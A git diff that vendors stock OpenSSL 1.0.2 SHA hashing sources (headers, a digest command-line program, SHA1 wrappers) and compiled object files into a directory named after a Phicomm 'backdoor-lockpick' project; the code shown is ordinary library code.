+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/sha.h>
+
+#define BUFSIZE 1024*16
+
+void do_fp(FILE *f);
+void pt(unsigned char *md);
+int read(int, void *, unsigned int);
+int main(int argc, char **argv)
+{
+    int i, err = 0;
+    FILE *IN;
+
+    if (argc == 1) {
+        do_fp(stdin);
+    } else {
+        for (i = 1; i < argc; i++) {
+            IN = fopen(argv[i], "r");
+            if (IN == NULL) {
+                perror(argv[i]);
+                err++;
+                continue;
+            }
+            printf("SHA(%s)= ", argv[i]);
+            do_fp(IN);
+            fclose(IN);
+        }
+    }
+    exit(err);
+}
+
+void do_fp(FILE *f)
+{
+    SHA_CTX c;
+    unsigned char md[SHA_DIGEST_LENGTH];
+    int fd;
+    int i;
+    unsigned char buf[BUFSIZE];
+
+    fd = fileno(f);
+    SHA_Init(&c);
+    for (;;) {
+        i = read(fd, buf, BUFSIZE);
+        if (i <= 0)
+            break;
+        SHA_Update(&c, buf, (unsigned long)i);
+    }
+    SHA_Final(&(md[0]), &c);
+    pt(md);
+}
+
+void pt(unsigned char *md)
+{
+    int i;
+
+    for (i = 0; i < SHA_DIGEST_LENGTH; i++)
+        printf("%02x", md[i]);
+    printf("\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha.h
new file mode 100644
index 0000000..e5169e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha.h
@@ -0,0 +1,214 @@
+/* crypto/sha/sha.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_SHA_H
+# define HEADER_SHA_H
+
+# include <openssl/e_os2.h>
+# include <stddef.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# if defined(OPENSSL_NO_SHA) || (defined(OPENSSL_NO_SHA0) && defined(OPENSSL_NO_SHA1))
+#  error SHA is disabled.
+# endif
+
+# if defined(OPENSSL_FIPS)
+#  define FIPS_SHA_SIZE_T size_t
+# endif
+
+/*-
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ * ! SHA_LONG has to be at least 32 bits wide. If it's wider, then !
+ * ! SHA_LONG_LOG2 has to be defined along.                        !
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ */
+
+# if defined(__LP32__)
+#  define SHA_LONG unsigned long
+# elif defined(OPENSSL_SYS_CRAY) || defined(__ILP64__)
+#  define SHA_LONG unsigned long
+#  define SHA_LONG_LOG2 3
+# else
+#  define SHA_LONG unsigned int
+# endif
+
+# define SHA_LBLOCK      16
+# define SHA_CBLOCK      (SHA_LBLOCK*4)/* SHA treats input data as a
+                                        * contiguous array of 32 bit wide
+                                        * big-endian values. */
+# define SHA_LAST_BLOCK  (SHA_CBLOCK-8)
+# define SHA_DIGEST_LENGTH 20
+
+typedef struct SHAstate_st {
+    SHA_LONG h0, h1, h2, h3, h4;
+    SHA_LONG Nl, Nh;
+    SHA_LONG data[SHA_LBLOCK];
+    unsigned int num;
+} SHA_CTX;
+
+# ifndef OPENSSL_NO_SHA0
+#  ifdef OPENSSL_FIPS
+int private_SHA_Init(SHA_CTX *c);
+#  endif
+int SHA_Init(SHA_CTX *c);
+int SHA_Update(SHA_CTX *c, const void *data, size_t len);
+int SHA_Final(unsigned char *md, SHA_CTX *c);
+unsigned char *SHA(const unsigned char *d, size_t n, unsigned char *md);
+void SHA_Transform(SHA_CTX *c, const unsigned char *data);
+# endif
+# ifndef OPENSSL_NO_SHA1
+#  ifdef OPENSSL_FIPS
+int private_SHA1_Init(SHA_CTX *c);
+#  endif
+int SHA1_Init(SHA_CTX *c);
+int SHA1_Update(SHA_CTX *c, const void *data, size_t len);
+int SHA1_Final(unsigned char *md, SHA_CTX *c);
+unsigned char *SHA1(const unsigned char *d, size_t n, unsigned char *md);
+void SHA1_Transform(SHA_CTX *c, const unsigned char *data);
+# endif
+
+# define SHA256_CBLOCK   (SHA_LBLOCK*4)/* SHA-256 treats input data as a
+                                        * contiguous array of 32 bit wide
+                                        * big-endian values. */
+# define SHA224_DIGEST_LENGTH    28
+# define SHA256_DIGEST_LENGTH    32
+
+typedef struct SHA256state_st {
+    SHA_LONG h[8];
+    SHA_LONG Nl, Nh;
+    SHA_LONG data[SHA_LBLOCK];
+    unsigned int num, md_len;
+} SHA256_CTX;
+
+# ifndef OPENSSL_NO_SHA256
+#  ifdef OPENSSL_FIPS
+int private_SHA224_Init(SHA256_CTX *c);
+int private_SHA256_Init(SHA256_CTX *c);
+#  endif
+int SHA224_Init(SHA256_CTX *c);
+int SHA224_Update(SHA256_CTX *c, const void *data, size_t len);
+int SHA224_Final(unsigned char *md, SHA256_CTX *c);
+unsigned char *SHA224(const unsigned char *d, size_t n, unsigned char *md);
+int SHA256_Init(SHA256_CTX *c);
+int SHA256_Update(SHA256_CTX *c, const void *data, size_t len);
+int SHA256_Final(unsigned char *md, SHA256_CTX *c);
+unsigned char *SHA256(const unsigned char *d, size_t n, unsigned char *md);
+void SHA256_Transform(SHA256_CTX *c, const unsigned char *data);
+# endif
+
+# define SHA384_DIGEST_LENGTH    48
+# define SHA512_DIGEST_LENGTH    64
+
+# ifndef OPENSSL_NO_SHA512
+/*
+ * Unlike 32-bit digest algorithms, SHA-512 *relies* on SHA_LONG64
+ * being exactly 64-bit wide. See Implementation Notes in sha512.c
+ * for further details.
+ */
+/*
+ * SHA-512 treats input data as a
+ * contiguous array of 64 bit
+ * wide big-endian values.
+ */
+#  define SHA512_CBLOCK   (SHA_LBLOCK*8)
+#  if (defined(_WIN32) || defined(_WIN64)) && !defined(__MINGW32__)
+#   define SHA_LONG64 unsigned __int64
+#   define U64(C)     C##UI64
+#  elif defined(__arch64__)
+#   define SHA_LONG64 unsigned long
+#   define U64(C)     C##UL
+#  else
+#   define SHA_LONG64 unsigned long long
+#   define U64(C)     C##ULL
+#  endif
+
+typedef struct SHA512state_st {
+    SHA_LONG64 h[8];
+    SHA_LONG64 Nl, Nh;
+    union {
+        SHA_LONG64 d[SHA_LBLOCK];
+        unsigned char p[SHA512_CBLOCK];
+    } u;
+    unsigned int num, md_len;
+} SHA512_CTX;
+# endif
+
+# ifndef OPENSSL_NO_SHA512
+#  ifdef OPENSSL_FIPS
+int private_SHA384_Init(SHA512_CTX *c);
+int private_SHA512_Init(SHA512_CTX *c);
+#  endif
+int SHA384_Init(SHA512_CTX *c);
+int SHA384_Update(SHA512_CTX *c, const void *data, size_t len);
+int SHA384_Final(unsigned char *md, SHA512_CTX *c);
+unsigned char *SHA384(const unsigned char *d, size_t n, unsigned char *md);
+int SHA512_Init(SHA512_CTX *c);
+int SHA512_Update(SHA512_CTX *c, const void *data, size_t len);
+int SHA512_Final(unsigned char *md, SHA512_CTX *c);
+unsigned char *SHA512(const unsigned char *d, size_t n, unsigned char *md);
+void SHA512_Transform(SHA512_CTX *c, const unsigned char *data);
+# endif
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1.c
new file mode 100644
index 0000000..8dd1943
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1.c
@@ -0,0 +1,121 @@
+/* crypto/sha/sha1.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/sha.h>
+
+#define BUFSIZE 1024*16
+
+void do_fp(FILE *f);
+void pt(unsigned char *md);
+#ifndef _OSD_POSIX
+int read(int, void *, unsigned int);
+#endif
+
+int main(int argc, char **argv)
+{
+    int i, err = 0;
+    FILE *IN;
+
+    if (argc == 1) {
+        do_fp(stdin);
+    } else {
+        for (i = 1; i < argc; i++) {
+            IN = fopen(argv[i], "r");
+            if (IN == NULL) {
+                perror(argv[i]);
+                err++;
+                continue;
+            }
+            printf("SHA1(%s)= ", argv[i]);
+            do_fp(IN);
+            fclose(IN);
+        }
+    }
+    exit(err);
+}
+
+void do_fp(FILE *f)
+{
+    SHA_CTX c;
+    unsigned char md[SHA_DIGEST_LENGTH];
+    int fd;
+    int i;
+    unsigned char buf[BUFSIZE];
+
+    fd = fileno(f);
+    SHA1_Init(&c);
+    for (;;) {
+        i = read(fd, buf, BUFSIZE);
+        if (i <= 0)
+            break;
+        SHA1_Update(&c, buf, (unsigned long)i);
+    }
+    SHA1_Final(&(md[0]), &c);
+    pt(md);
+}
+
+void pt(unsigned char *md)
+{
+    int i;
+
+    for (i = 0; i < SHA_DIGEST_LENGTH; i++)
+        printf("%02x", md[i]);
+    printf("\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1_one.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1_one.c
new file mode 100644
index 0000000..a6dd760
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1_one.c
@@ -0,0 +1,79 @@
+/* crypto/sha/sha1_one.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/sha.h>
+
+#ifndef OPENSSL_NO_SHA1
+unsigned char *SHA1(const unsigned char *d, size_t n, unsigned char *md)
+{
+    SHA_CTX c;
+    static unsigned char m[SHA_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    if (!SHA1_Init(&c))
+        return NULL;
+    SHA1_Update(&c, d, n);
+    SHA1_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c));
+    return (md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1_one.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1_one.o
new file mode 100644
index 0000000000000000000000000000000000000000..ba676e6d5d0b7fc085b42b588e392c48e011099d
GIT binary patch
literal 2024
zcmbu9-)qxQ6vuCx&P}&v^~b|tB6--Pq6^KcIEPBpwOuM<6}yUvGp1d(j<soNQ|Nq9
zWK0ZmvIif0^wGaU2KpDs{(wCQ3d%$UA4HkwB)MG{(kH)gxaWNCIrrxN%Hy<>2{8<z
zV#sxJ5K&6VoA803u-yb1Bm?B<(3#)T?X2}nDrBv{(wwq6hP?%O?Q45M-UyFHA(E}s
zXj$Br*FTtS*4mLbE2Dj~_3bleu5X)B#rmOGdz8r5o??BnJKsLAtDVd*Y+C#%Z@^Fs
za@-l%?6K42wfAks+MSo~N%PYEcQ|ZEGt<*ke6&z(8D@*WBE*H*xOll`hvK7&m=L>o
z&cRLvE;9nw12!{TAR$7wk+EQ?Q%*yehqnmRjxZwwy?tA-VON2lcKcppo8claLTPSz
zlTCB{^RUcCpZ27<*G#C&MN=G~<c5=6B+2!;HQgFKi!k}VAJoqVo)ms7{o2D-ER5vW
z0073r>H08_B}e?}cFdCAE<AWOti79uOHM*~!t?$1o&g&M!~OS501(6{yYN&Op6kNZ
zE}S&WnyA(cT_};N5RXq>B6(R7i8`a?l9Hn4GMRjOPMwpIN?NtM)U2^=I$oi^pqaYk
zXO<1ELUK3Lv-!NDmMXetG<Bk?O;anasHO6Xx~MHz2<{6C?wx%qfA$?+v#G=I%qYk8
zpzve|!6?6r5QLlqqkIV=2>B2g<xdcTkmEj6&V!G_??LNGXs%XGtw@BX*>Ku2^%{Cb
z6HL8r5&_n)5uw;@5}{P9R&@iIQ8RS`-qyIibT?iyT0*^1tLqJOl?e6-dRbj;XjQ#4
z<^MQ56ysa+-{=G|6uo~=<m6Hx+YvC_n*^9wTkccaa^W#(aUS{-@IIr?f+6?6%pL3u
z5axPy0RkM;U%%@ndEYG}|637(;g~V(^k~=h&wCiUbbi`Sd6+k~pC))=K<*7-_}4ge
zhair)^*s1q(fy;W2o9$D>tk;H9h&I2{`z^~LFdOK1krQC^TS$NPkGSXSoh4G|CQVJ
o1EXVLKdnCszW?m7pLby$1CQL{I^;NbLG_dF_g6ZZj^nTY2j5=UH~;_u

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1dgst.c
new file mode 100644
index 0000000..a67f1fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1dgst.c
@@ -0,0 +1,74 @@
+/* crypto/sha/sha1dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/crypto.h>
+#include <openssl/opensslconf.h>
+#if !defined(OPENSSL_NO_SHA1) && !defined(OPENSSL_NO_SHA)
+
+# undef  SHA_0
+# define SHA_1
+
+# include <openssl/opensslv.h>
+
+const char SHA1_version[] = "SHA1" OPENSSL_VERSION_PTEXT;
+
+/* The implementation is in ../md32_common.h */
+
+# include "sha_locl.h"
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..e0605e71b370f912c433eb39e1fbcc33188d1946
GIT binary patch
literal 6896
zcmbtZZ%kZQcAq;y!t8nn;?OR;AqlTL-P(<pa&52TO}q&g?uBtnH`_JNN*gC$9FsU&
z3>FY?QblQ0lSo(N*X;*?XeEDWB}<i>eCUV$;H>;%-V88f{)Bme&49;-By2p!BqqU8
z_!Ecz&V6szlsanFKIzT9@4j=+J?D4+-3NcCnj3?R1qv4nJQ29_R9FoJ{^Q$s=5=OT
z7x-3SOF;ZwJS`50mIM1`>`@tesyOykX{>3Bj5U=<^=pxHQQZ<*)}u1^eW^c_vDb@v
z%1M;SSVyUhJy$KQQBgK5oC`rwHY)7X761I|-~WQAMA?Wa8)B37cJCfqk$O<-gOQA2
zM$~f=$w#I2g>c>j-w?f;zyklQ-afV6(8r$J#!^zprIip)I_ShpBp*~dK~hu9jWuo|
zrmS9t5<8$zSz6hr7_s8z)8)R<9NyNJ4Z?z9C?7kBfs+X0owZh-(IEB|d{weRp)Uw)
zP&iJB;t4#<*iR}%*#)VaBXbb_5Q&C>IYp$djP*ovL=3}~-CId-@diwlK2u)k70~Ae
zhg{bg3<|ztpMTgRbd=5r*rb>vV~tg!EG@N+EC`(j%Yxt;W#K*Xr0rAR@wX=Mq#kur
zC4}On<dXzG6yTHg>F@eP6Kqs!2a3_?N`66F4gn~+D|NrRLzrc*UIlOr>w`eWM`MuR
zhP7r(y(Zb1(1X?pd6#_7`}vU2Ls*t<q{;5BrA-NnSwLcqLtz<vdN;ws*90F2kz`3x
zMzHJ=Ixnmn_4fHkiOCs(#CVC|L-6>0v_i0fn5_Yjy?TbMEKB22Px71A3`ZoL{sz&J
zT~o$BXDFzzE55*|<gOzKEuNCQUW-gfYf9ji;uDIG^6N@pt+(GPF<ZEOWVCQo(USvp
zWRN}*iDPM6BGCIJpEe-yX~Dm$x6gdfY&Wk*g!LW}aQYD$SDWlJk9+HaUDe}G63)1)
z*Z7d!)sE=GPu2jTc>gXLnF9_kO>&Z5R(eTtAT=St<;Io1DRp}!jW@s)!2E^Lk&i2D
z$>aqeQv8-5)KY&=Sj-432ipi7J|XlKtO+(8do3~y%kuyR!z}JT0E8EADu(FgS9Uc=
z79_u7pMLCLZ%lO%ItT}LQR)vQzbyHR@$HAM!!8PEIEX9`6CIFK`WhS8^NN2262U)#
z+t_%lC6eFOLV({yPV$7CQ1&~2WH{I-q!b~=K9R9@><U2Ohkn6t0|>!qus0xlgs92-
zVWB@(YzEK>4#p%P{+x`*nnWsO<SryR{lpO}!cCeY0s&RV5S>%(iqdPq$>aS}Af>TJ
zyc5Khqn|#+qR%_gXrFn|+x&CIa!TKj&<y)Z4n0sV{Ox9mFHJwgK4%u34|trw{D#!O
zhnWI^NN>BG<dF3t0jS_Zlo_5Re!w&+0aw<SlY{mT8SU9+eS>ypmucHs1q1mSu}t`+
zvrtd*58($x;NcJUhlyRWC84hhX8>3)DSb)l4}?1)_<WQ7&JT@zKCRfiD)?ibypBMK
zON1j3ap?i@NV3qOah5!WLWGbJ`np6^%?TH{Pf=|`Im;?O)nuRDYlM?DP~;VRUuk$a
zE1W(!FN0kBu}3fnN4zgsUdE7Ql%WtkVltH&`%F6BqW93yg+eLGFH+VKx8x&K*a+r+
z5Mnf$tuN9Dtw1}1kTU6pssv0PCpMnulkg3hjEaZQ%af111f<L`ej7m&O1^H`PX9Tv
zxp964_6Rl)U5JCt>wfeeo<%9#?&$;jU@=Q8?NWWi%uS(a#3eE;u4jNHTFVTjh2)>2
zG-EbL6<qS`D3ql}yLsTuQbNbw1VHXXx)OIE6+$Y{EQLM=kj5JA-ftQP2XT=mQ<x+4
zGD1qDmd8uDX<W=f<1rD5&O!l_kqi`RBaS6x44x&oA`jp``iUENUZ4=m0$p<JFq8|@
zUWhYV?^7&|T8;n|dW;N3Pc%8Fm;<#cbLSuU4ejM8mrg4$WYbj4!NlS^LsnBm52dYT
